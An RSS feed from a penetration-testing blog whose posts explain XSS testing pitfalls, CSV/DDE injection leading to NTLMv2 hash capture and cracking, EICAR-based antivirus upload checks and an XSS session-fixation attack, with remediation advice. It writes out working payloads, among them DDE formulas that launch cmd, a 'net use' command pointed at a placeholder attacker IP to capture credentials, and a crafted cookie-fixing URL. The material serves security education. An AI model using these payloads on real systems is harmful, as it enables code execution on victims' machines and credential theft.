<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Explore Security &#187; Web Applications</title>
	<atom:link href="http://www.exploresecurity.com/category/web-applications/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.exploresecurity.com</link>
	<description>IT security tools, techniques and commentary</description>
	<lastBuildDate>Wed, 15 Jun 2022 09:21:02 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.6.1</generator>
		<item>
		<title>The Case of the Customer Data and the Third-Party Analytics Site</title>
		<link>http://www.exploresecurity.com/the-case-of-the-customer-data-and-the-third-party-analytics-site/</link>
		<comments>http://www.exploresecurity.com/the-case-of-the-customer-data-and-the-third-party-analytics-site/#comments</comments>
		<pubDate>Fri, 17 May 2019 15:32:32 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Data Privacy]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[GDPR]]></category>
		<category><![CDATA[penetration testing]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=460</guid>
		<description><![CDATA[I recently had an article published on the NCC Group blog about a pentest during which it became clear that customer personal data was being sent to a third party. It&#8217;s common for websites to use metrics/analytics services to collect usage data on how users are interacting with the sites. I thought it would be [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I recently had an article <a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/may/the-case-of-the-customer-data-and-the-third-party-analytics-site/">published</a> on the NCC Group blog about a pentest during which it became clear that customer personal data was being sent to a third party. It&#8217;s common for websites to use metrics/analytics services to collect usage data on how users are interacting with the sites. I thought it would be useful to highlight the danger of sensitive data being accidentally sent to third parties without due care and attention paid to GDPR. Have a read!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/the-case-of-the-customer-data-and-the-third-party-analytics-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>JWT Attack Walk-Through</title>
		<link>http://www.exploresecurity.com/jwt-attack-walk-through/</link>
		<comments>http://www.exploresecurity.com/jwt-attack-walk-through/#comments</comments>
		<pubDate>Fri, 25 Jan 2019 10:13:31 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[JWT]]></category>
		<category><![CDATA[OpenSSL]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=455</guid>
		<description><![CDATA[Over on the NCC Group website I published a solution to an open demonstration of the well-known JSON Web Token (JWT) algorithm confusion vulnerability (the one where you swap the token algorithm from &#8216;RS&#8217; to &#8216;HS&#8217; and sign your payload with the public key). I use OpenSSL to gain full visibility of what&#8217;s happening and, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Over on the NCC Group website I <a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/january/jwt-attack-walk-through/">published</a> a solution to an open demonstration of the well-known JSON Web Token (JWT) algorithm confusion vulnerability (the one where you swap the token algorithm from &#8216;RS&#8217; to &#8216;HS&#8217; and sign your payload with the <em>public</em> key). I use OpenSSL to gain full visibility of what&#8217;s happening and, by walking through the method, if you ever need to test this vulnerability yourself, it will hopefully help to avoid false negatives.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/jwt-attack-walk-through/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Missing XSS flaws with innerHTML and jQuery</title>
		<link>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/</link>
		<comments>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/#comments</comments>
		<pubDate>Wed, 28 Mar 2018 15:11:42 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[jQuery]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=440</guid>
		<description><![CDATA[I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind. [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind.<span id="more-440"></span></p>
<p>These days a typical web app pulls in data from background XHR requests, the responses come back in a data format like JSON, and the data is parsed client-side and inserted into the DOM of the page. This means, of course, that the encoding of the data in the response is not sufficient by itself to know whether there’s a potential XSS risk – it depends how the data is finally encoded when inserted into the page. But consider the following:</p>
<ol>
<li>You enter <code>&lt;script&gt;alert(1)&lt;/script&gt;</code> hoping for a quick and dirty win – nothing</li>
<li>You suspect input validation so you enter something that you hope will pass validation but test encoding, e.g. <code>xss &lt; &gt; test</code></li>
<li>You inspect the page using the browser dev tools and see it has been inserted as <code>xss &amp;lt; &amp;gt; test</code></li>
<li>So the encoding looks good, and you move on -</li>
</ol>
<p>But wait! Even dangerous DOM manipulation can perform encoding in a text context. For example, <code>innerHTML</code> will observe the <a href="https://w3c.github.io/DOM-Parsing/#xml-serializing-a-text-node">rules</a> and, in a text context, will encode <code>&lt;</code> as <code>&amp;lt;</code> and <code>&gt;</code> as <code>&amp;gt;</code> (and <code>&amp;</code> as <code>&amp;amp;</code> in fact), otherwise those characters are inserted/parsed literally. So the encoding seen in step 3 could be explained by this, meaning that the potential for XSS still exists. It’s precisely because jQuery uses <code>innerHTML</code> as part of functions like <a href="http://api.jquery.com/append/"><em>append()</em></a> that the documentation is full of caveats about not using data from &#8220;untrusted sources&#8221;.</p>
<p>Let’s assume the developers haven’t thought about XSS at all. So why did step 1 fail? This is because the <a href="https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerhtml0">spec</a> says &#8220;script elements inserted using <code>innerHTML</code> do not execute when they are inserted&#8221;. If the first test case had been <code>&lt;img src=x onerror=alert(1)&gt;</code> the XSS would have been revealed in step 1.</p>
<p>Hope that’s of some use!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>From CSV to CMD to qwerty</title>
		<link>http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/</link>
		<comments>http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/#comments</comments>
		<pubDate>Tue, 19 Apr 2016 22:53:41 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[CSV]]></category>
		<category><![CDATA[DDE]]></category>
		<category><![CDATA[Excel]]></category>
		<category><![CDATA[XLS]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=415</guid>
		<description><![CDATA[The ongoing breach stories of targeted email campaigns harbouring malicious attachments made me think of writing up a summary of a presentation I gave at the amazing NCC Con held in Dublin in January this year. The talk was based on a pentesting war story that started off exploiting the old (but I believe often [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>The ongoing breach stories of targeted email campaigns harbouring malicious attachments made me think of writing up a summary of a presentation I gave at the amazing <a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/january/ncc-con-europe-2016/">NCC Con</a> held in Dublin in January this year. The talk was based on a pentesting war story that started off exploiting the old (but I believe often overlooked) Dynamic Data Exchange (DDE) trick to go from an Excel export function in a web app to OS code running on users&#8217; workstations. From there, the story takes us on to domain creds via some NTLMv2 theory (without a pentest laptop), a bug in hashcat and a new script &#8220;catflap&#8221;.<span id="more-415"></span></p>
<p>[EDIT - for more of the <em>CSV</em> and <em>CMD</em> and less of the <em>qwerty</em>, take a look at this <a href="http://www.slideshare.net/exploresecurity/camsec-sept-2016-tricks-to-improve-web-app-excel-export-attacks">presentation</a> I did later in the year.]</p>
<h3>From CSV to CMD</h3>
<p>DDE is an old <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms648774(v=vs.85).aspx">Microsoft technology</a> used to facilitate data transfer between applications, a form of Inter-Process Communication (IPC). The security risks in the context of web applications were, to my knowledge, first published <a href="http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/">here</a> by <a href="https://twitter.com/albinowax">James Kettle</a> (I would have sworn this technique was around before 2014 &#8211; how time flies).</p>
<p>A brief reminder then: imagine an export function in a web app, where some of the data in the cells comes from user input (so like persistent XSS it is stored and later reflected) e.g. consider an application that stores the following parameter value:</p>
<p><code><span style="font-size: 0.857143rem; line-height: 2;">=cmd|'/k ipconfig'!A0</span></code></p>
<p style="text-align: left;">On requesting an export, a CSV file is returned that includes this value in a field. When this file is opened, Excel knows that this DDE reference could be dangerous and issues a couple of warnings:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/warning1.png"><img class="aligncenter  wp-image-417" alt="warning1" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/warning1.png" width="410" height="194" /></a><a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/warning2.png"><img class="aligncenter size-full wp-image-416" alt="warning2" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/warning2.png" width="781" height="139" /></a>In this case, an eagle-eyed user might raise an eyebrow at CMD.EXE but, as the original article notes, if the user requested the Excel file and it came from a source they trust, why wouldn&#8217;t it be secure? And we know that users click through warnings anyway.</p>
<p style="text-align: left;">When <code>cmd /k ipconfig</code> runs, the /k persists the command window for a screenshot to use in the report <img src='http://www.exploresecurity.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> <a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/cmd-ipconfig.png"><img class="aligncenter size-full wp-image-420" alt="cmd-ipconfig" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/cmd-ipconfig.png" width="1437" height="455" /></a>In fact, without that persistence, the command seems to run in a minimised window and then of course exits, which is rather nice for our attacker. I should say that export to CSV seems to be cleaner from the attacker&#8217;s perspective than export to XLS or XLSX, which often requires extra action by the user to activate the payload such as clicking into the malicious cell, which isn&#8217;t desirable. All of this behaviour is subject to the version of Excel running and its configuration.</p>
<h3>From CMD to qwerty</h3>
<p>The war story concerned an <em>internal</em> application that was vulnerable to the DDE trick, and so I started playing around with payloads that would be more exciting than <code>ipconfig</code> or <code>calc</code>. Here&#8217;s a simple one:</p>
<p><code>cmd /c net use \\&lt;attacker_IP&gt;\c$</code></p>
<p>In this case the &#8220;attacker_IP&#8221; belonged to a locked-down workstation (no pentest laptops allowed) &#8211; but it did, curiously enough, have Wireshark installed. So here was the &#8220;net use&#8221; connection from the &#8220;victim&#8221; (which was in fact a machine I was using and thus I knew the username and password):<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/net-use.png"><img class="aligncenter size-full wp-image-421" alt="net-use" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/net-use.png" width="1189" height="303" /></a>Bear in mind this was an internal test: if the victim was using a vulnerable internet-facing website, their ISP would likely <em>[cough]</em> block the outgoing SMB connection.</p>
<p>I was dealing with NTLMv2 here: a quick <a href="http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats">reminder</a> showed that I needed to pull out the following for John:</p>
<p><strong><code>username:$<span style="color: green;">NETNTLMv2</span>$domain$challenge$HMAC-MD5$blob</code><br />
</strong><br />
What&#8217;s in <span style="color: green;"><strong>green</strong></span> is known at this point (&#8220;NETNTLMv2&#8243; is a constant). I could immediately fill in the domain and username fields as they&#8217;re given away in cleartext by the NTLMv2 exchange, helpfully pulled out in the (obfuscated) Packet List above (and anonymised below):</p>
<p><strong><code><span style="color: green;">smithjer</span>:$<span style="color: green;">NETNTLMv2</span>$<span style="color: green;">domain</span>$challenge$HMAC-MD5$blob<br />
</code></strong><br />
So what about the other bits? They all relate to the NTLM authentication, which is a challenge-handshake protocol:</p>
<p><b>1. Client &gt; Server (Type 1, negotiation)</b><br />
Features supported by the client and requested of the server<br />
<b>2. Server &gt; Client (Type 2, challenge)</b><br />
Features supported and agreed upon by the server + a challenge<br />
<b>3. Client &gt; Server (Type 3, authentication)</b><br />
More information about the client + response(s)</p>
<p>The essential difference between NTLM and NTLMv2 is how the response is calculated. NTLM uses MD4 and DES in a weak way which is well known (5 NULL bytes <em>yada yada yada</em>); NTLMv2 uses HMAC-MD5 based on more than just the password and challenge, which is where the &#8220;blob&#8221; comes in. So that&#8217;s covered off the &#8220;challenge&#8221;, &#8220;HMAC-MD5&#8243; and &#8220;blob&#8221; that&#8217;s missing from the John hash I&#8217;m having to build up from scratch. (Remember, I had no tools, otherwise <a href="https://github.com/SpiderLabs/Responder">Responder</a> would have made this easy.) Here&#8217;s the challenge:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/challenge.png"><img class="aligncenter size-full wp-image-422" alt="challenge" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/challenge.png" width="442" height="151" /></a>And here&#8217;s the HMAC-MD5 and blob (which is everything after the HMAC in the &#8220;NTLM Response tree&#8221;):<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/HMAC-blob.png"><img class="aligncenter size-full wp-image-423" alt="HMAC-blob" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/HMAC-blob.png" width="663" height="261" /></a><span style="line-height: 1.71429; font-size: 1rem;">To get the blob, you can copy the NTLM Response bytes from within Wireshark and remove the first 16 bytes (which is the HMAC). The blob is likely to start 0&#215;01010000&#8230;So we now have:</span></p>
<p><code><strong><span style="color: green;">smithjer</span>:$<span style="color: green;">NETNTLMv2</span>$<span style="color: green;">domain</span>$<span style="color: green;">36edff8376e59e18</span>$<span style="color: green;">4f68b56e9ce788d010f58b4f049b5c7f</span>$<span style="color: green;">0101000000000000295779de01bbd001b6f955bf062e...</span></strong><br />
</code><br />
That&#8217;s the hard part done, right? Wrong.</p>
<h3>Let&#8217;s get cracking</h3>
<p>Here was John&#8217;s response (bear in mind I knew the password), and, after duly modifying the hash format, hashcat wasn&#8217;t happy either:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/hash-no-crack.png"><img class="aligncenter size-full wp-image-424" alt="hash-no-crack" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/hash-no-crack.png" width="718" height="284" /></a><span style="line-height: 1.71429; font-size: 1rem;">Note the &#8220;skipping line&#8221; error. Turns out hashcat has a bug, which (I later found out) oclhashcat doesn&#8217;t suffer from. I experimented with it and </span><a style="line-height: 1.71429; font-size: 1rem;" href="https://github.com/hashcat/hashcat/issues/3">reported</a><span style="line-height: 1.71429; font-size: 1rem;"> it &#8211; hashcat has problems when the blob length is over 224 bytes. For some reason, it&#8217;s not been assigned a &#8220;bug&#8221; label but a &#8220;new feature&#8221; label. Anyway, back to John: remember the format on the cheatsheet was:</span></p>
<p><strong><code>username:$NETNTLMv2$domain$challenge$HMAC-MD5$blob</code></strong></p>
<p>Turns out the hashcat format worked a treat, i.e.</p>
<p><code><strong>username::domain:challenge:HMAC-MD5:blob</strong></code></p>
<p>To be fair to pentestmonkey, &#8220;this sheet was originally based on john-1.7.8-jumbo-5. Changes in supported hashes or hash formats since then may not be reflected on this page&#8221;, and I was using a later version. Anyway, all&#8217;s well that ends well:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/hash-cracked-john.png"><img class="aligncenter size-full wp-image-428" alt="hash-cracked-john" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/hash-cracked-john.png" width="919" height="116" /></a></p>
<h3>catflap</h3>
<p>In order to look into the bug I found, I wrote a script (which I called <a href="https://github.com/exploresecurity/catflap"><em>catflap</em></a>) that serves two purposes:</p>
<ol>
<li>It extracts what hashcat needs from the NTLMv2 exchange in a Wireshark capture file.</li>
<li><span style="line-height: 1.71429; font-size: 1rem;">It allows you to produce a more realistic test case to check your NTLMv2 cracker is working properly. For this catflap will accept a normal hash format from a file as well as a capture file. catflap will recalculate the NTLMv2 response based on a password you supply. This means all the other variables (username, domain, challenge and, crucially, the blob) in the resulting test hash are exactly the same as the ones in your captured exchange, but in this test case you know the password. In this way you can ensure your cracking tool is working correctly, and acts as a better test than the standard hash examples out there, useful though they are. Of course, you could also play about with other inputs, which is what I did with the blob find the bug.</span></li>
</ol>
<p>Usage is simply:</p>
<p><code>catflap &lt;capture_file | hashcat_file&gt; [password]</code></p>
<p>The following shows catflap changing the HMAC response to set the password to &#8220;password&#8221;:<a href="http://www.exploresecurity.com/wp-content/uploads/2016/04/catflap.png"><img class="aligncenter size-full wp-image-429" alt="catflap" src="http://www.exploresecurity.com/wp-content/uploads/2016/04/catflap.png" width="962" height="400" /></a>You can then run that edited hash through your cracker of choice to ensure it spits out &#8220;password&#8221;. If not, something&#8217;s gone wrong. You can find catflap on <a href="https://github.com/exploresecurity/catflap">github</a>.</p>
<h3>Input validation and sanitisation</h3>
<p>Whenever I find an Excel export function in a web app, most of the time the DDE trick works because the characters used to launch the payload aren&#8217;t the usual suspects. It&#8217;s not a well-known attack vector, even among pentesters (or at least it&#8217;s been forgotten) so it&#8217;s worth remembering to check for this.</p>
<p>What about remediation? The <a href="https://web.archive.org/web/20160324063226/http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/"><em>original</em></a> article on this stated that &#8220;the best defence strategy we are aware of is prefixing cells that start with &#8216;=&#8217; with an apostrophe&#8221;. Last month this topic came up in a company-wide discussion at <a href="https://www.nccgroup.trust/">work</a>, and my colleague <a href="https://twitter.com/bones_codes">Cara Marie</a> noted that &#8216;+&#8217; and &#8216;-&#8217; could be used to launch a command too. Turns out (thanks to Michael Roberts, another NCC bod) that this had been lurking around for while, for example <a href="https://hackerone.com/reports/72785">here</a>). Michael added that you can also use &#8216;@&#8217; in the format:</p>
<p><code>@SUM(cmd|'/c calc'!A0)</code></p>
<p>as well as surrounding the payload with quotes such as:</p>
<p><code>"=cmd|'/c calc'!A0"</code>.</p>
<p>Over this last month the original article has been updated twice to reflect the same findings (except for the use of quotes). So, as far as I know, two independent groups came up with new bypasses for the original recommendation. The point here, then, is that the blacklist approach by itself often fails (which shouldn&#8217;t be news to anyone who&#8217;s done a re-test). We need to perform validation based on a whitelist of characters and syntax wherever possible. For example, if a field is a phone number, there should be no need for characters such as &#8216;=&#8217; and &#8216;@&#8217;. Starting off with &#8216;+&#8217; is reasonable (prefixing an international dialling code) but after that we shouldn&#8217;t see any non-numeric characters. We can also restrict the length of that field too. With these restrictions in place, we don&#8217;t even need to implement (and maintain) a blacklist.</p>
<h3>Red teaming</h3>
<p>The story of this article was set around a web application that allowed export but the DDE trick is valuable to red teams trying to get malicious attachments through email. The reason for this is that a DDE payload isn&#8217;t a macro and files that use it are often able to fly through perimeter content checks that would stop files with macros.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Testing for Anti-Virus on File Upload</title>
		<link>http://www.exploresecurity.com/testing-for-anti-virus-on-file-upload/</link>
		<comments>http://www.exploresecurity.com/testing-for-anti-virus-on-file-upload/#comments</comments>
		<pubDate>Tue, 26 May 2015 21:42:17 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[anti-virus]]></category>
		<category><![CDATA[EICAR]]></category>
		<category><![CDATA[file upload]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=386</guid>
		<description><![CDATA[One of the issues on a standard web app checklist is to test whether or not an application that supports file upload is scanning those files for malware. This article reviews the methodology and highlights the danger of corrupting an EICAR test file so that it no longer acts as a valid test. It is [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>One of the issues on a standard web app checklist is to test whether or not an application that supports file upload is scanning those files for malware. This article reviews the methodology and highlights the danger of corrupting an EICAR test file so that it no longer acts as a valid test. It is based on an internal presentation I gave, the slides for which are <a href="http://www.slideshare.net/exploresecurity/antivirus-checking-on-file-upload">here</a>.<span id="more-386"></span></p>
<h3>Methodology</h3>
<p>It&#8217;s really quite simple &#8211; upload a file, download it and compare the hashes. If you upload successfully but don&#8217;t download then that&#8217;s not sufficient proof &#8211; perhaps the file has been silently quarantined. Showing that the hashes of the uploaded and downloaded files are the same proves that the file has not been cleaned up. (If no download feature is available, you can only <em>speculate</em> on the lack of an error message on upload.)</p>
<p>It&#8217;s obviously unfair to report a system lacking AV if the file you upload gets only 1 out of 57 hits on VirusTotal, for example. So running the file through VirusTotal and including a screenshot in the report shows the client that the file should have been detected. The output of VirusTotal includes a SHA-256 hash so that nicely ties in with hashing the uploaded and downloaded files, mentioned above.</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/virustotal.jpg"><img class="aligncenter size-full wp-image-390" alt="virustotal" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/virustotal.jpg" width="577" height="245" /></a></p>
<h3>Which file?</h3>
<p>Of course, you don&#8217;t want to be uploading real malware. This is where the EICAR test comes in &#8211; a widely adopted benign signature that triggers an alert so that you can be sure your anti-virus product is running correctly. So, during a web application assessment, you put together a test file thus:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-notepad.jpg"><img class="aligncenter size-full wp-image-388" alt="eicar-test" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-notepad.jpg" width="1225" height="276" /></a></p>
<p>You upload and download it with no problem &#8211; so the files aren&#8217;t being checked for malware, right? Wrong. Take a look at the VirusTotal result for this file:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/vt-eicar-notepad.jpg"><img class="aligncenter size-full wp-image-389" alt="vt-eicar-test" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/vt-eicar-notepad.jpg" width="585" height="243" /></a></p>
<p>It would be unfair to report a lack of anti-virus scanning using this file as a test case &#8211; and not, as we&#8217;ll soon see, because most of the AVs have missed it.</p>
<p>Okay, what about this Word document?</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-word.jpg"><img class="aligncenter size-full wp-image-396" alt="eicar-word" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-word.jpg" width="1153" height="313" /></a></p>
<p>Hopefully that was a no-brainer. This file got no hits on VirusTotal because the document text isn&#8217;t stored exactly as it&#8217;s seen and thus the EICAR signature was not in the raw file at all.</p>
<h3>The EICAR test</h3>
<p>If you haven&#8217;t already guessed, the EICAR test specification is stricter than the appearance of that well-known string. According to the <a href="http://www.eicar.org/86-0-Intended-use.html">EICAR site</a> &#8220;any anti-virus product that supports the EICAR test file should detect it in any file providing that the file starts with the following 68 characters&#8230;<code>X5O!P&#37;@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*</code>&#8220;. Don&#8217;t be fooled by the printable ASCII, though &#8211; the file is in fact executable, shown below on a Windows XP SP3 machine:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-running.jpg"><img class="aligncenter size-full wp-image-387" alt="eicar-running" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-running.jpg" width="1037" height="374" /></a></p>
<p>Let&#8217;s take that Word doc and, using a hex editor, stick the EICAR signature at the front:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-word-ed.jpg"><img class="aligncenter size-full wp-image-391" alt="eicar-word-ed" src="http://www.exploresecurity.com/wp-content/uploads/2015/05/eicar-word-ed.jpg" width="972" height="307" /></a></p>
<p>Now VirusTotal reports 26 out of 56 (46%). <span style="line-height: 1.714285714; font-size: 1rem;">In contrast when we put the signature elsewhere in the file (middle or end) we get 1 out of 57 hits.</span></p>
<p>Technically the anti-virus products that <em>haven&#8217;t</em> reported the file are quite right not to do so because there&#8217;s another condition that the file &#8220;is exactly 68 bytes long&#8221;. The spec goes on to say, though, that &#8220;it may be optionally appended by any combination of whitespace characters with the total file length not exceeding 128 characters. The only whitespace characters allowed are the space character, tab, LF, CR, CTRL-Z&#8221;.</p>
<p>So let&#8217;s truncate the Word doc to 112 bytes &#8211; and this time VirusTotal reports 34 out of 56 hits (61%), compared to the original 26 (46%). As you can imagine, as we edit the file to get closer and closer to the original EICAR file, the hit rate goes up and up.</p>
<h3>In summary</h3>
<p>When testing file uploads for the presence of anti-virus scanning, the test file should be picked up by a significant number of AVs otherwise it’s not a fair test. To this end, it’s safest to use the EICAR file – but if you mess with the original too much (even if the signature is still intact), you might inadvertently create a file that isn’t an EICAR test at all. The specification for the EICAR test file is actually quite strict, although AVs tend to be overzealous in reporting it.</p>
<p>The best approach is simply to rename the EICAR test file to a file format the application allows you to upload, e.g. change eicar.com to eicar.pdf. One potential niggle is that the file is no longer in a valid format for the file type it&#8217;s purporting to be, e.g. PDFs don&#8217;t start with <code>X50!P%@AP</code> so if there&#8217;s any file <em>content</em> analysis being done, then the file may be rejected. Depending on the error, this could be taken as evidence that AV is running when in fact it&#8217;s not, so other tests are required to confirm this. If text files are allowed, always use the original EICAR test file as a .txt.</p>
<p>Finally, remember that the aim of this check is not to qualitatively assess the anti-virus, you&#8217;re really only aiming to prove whether or not AV is running. Once you have proof that it is, stop. It&#8217;s really all you can expect to check &#8211; and all that should be expected from you within the bounds of a standard application pentest.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/testing-for-anti-virus-on-file-upload/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>When HTML Encoding Helped XSS</title>
		<link>http://www.exploresecurity.com/when-html-encoding-helped-xss/</link>
		<comments>http://www.exploresecurity.com/when-html-encoding-helped-xss/#comments</comments>
		<pubDate>Fri, 30 Jan 2015 10:19:17 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=342</guid>
		<description><![CDATA[Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I previously explained and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I <a href="http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/">previously explained</a> and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a working XSS payload!<span id="more-342"></span></p>
<h3>The problem</h3>
<p>The application used a bespoke session management cookie. I&#8217;ll call it MYSESSIONID. On login, it wasn&#8217;t renewed. I couldn&#8217;t push a session cookie onto the victim in a classic session fixation attack. However, I had XSS in an unauthenticated page &#8211; but not the login page. The filtering in place used a combination of removal and encoding. Characters that were stripped out included:</p>
<p><code>+ ; ( ) ? &lt; &gt;</code></p>
<p>Characters that were allowed included:</p>
<p><code>" ' = [ ] / , .</code></p>
<p>So even though MYSESSIONID wasn&#8217;t protected with the <em>HttpOnly</em> flag, I just couldn&#8217;t construct a payload to steal it. Instead I looked to set one of my own. Here&#8217;s a breakdown of the attack:</p>
<h3>1. Get a valid cookie</h3>
<p>The application did not accept arbitrary session management cookies so the attacker sends a request to get a valid one. In this case, simply having no MYSESSIONID wasn&#8217;t enough, the cookie had to be present but an invalid value did the trick:</p>
<p><code>Cookie: MYSESSIONID=aaaaaaaaaaaaaaaaaaa:xx01</code></p>
<p>returned</p>
<p><code>Set-Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01; Path=/; Domain=.example.com</code></p>
<h3>2. The XSS</h3>
<p>The malicious link looked something like this (the highlighted bits are explained below):</p>
<p><code>https://www.example.com/app/folder/page?vuln=foo"<span style="color: red;">%0a</span>document.cookie%3d"MYSESSIONID%3dNDnQrZ6JsMHyJTBCw8n:xx01<span style="color: blue;">:%0d</span><span style="color: red;">path%3d/app/</span></code></p>
<p>When clicked, the XSS flaw wrote the following to the return page inside a JavaScript code block:</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/";</code></p>
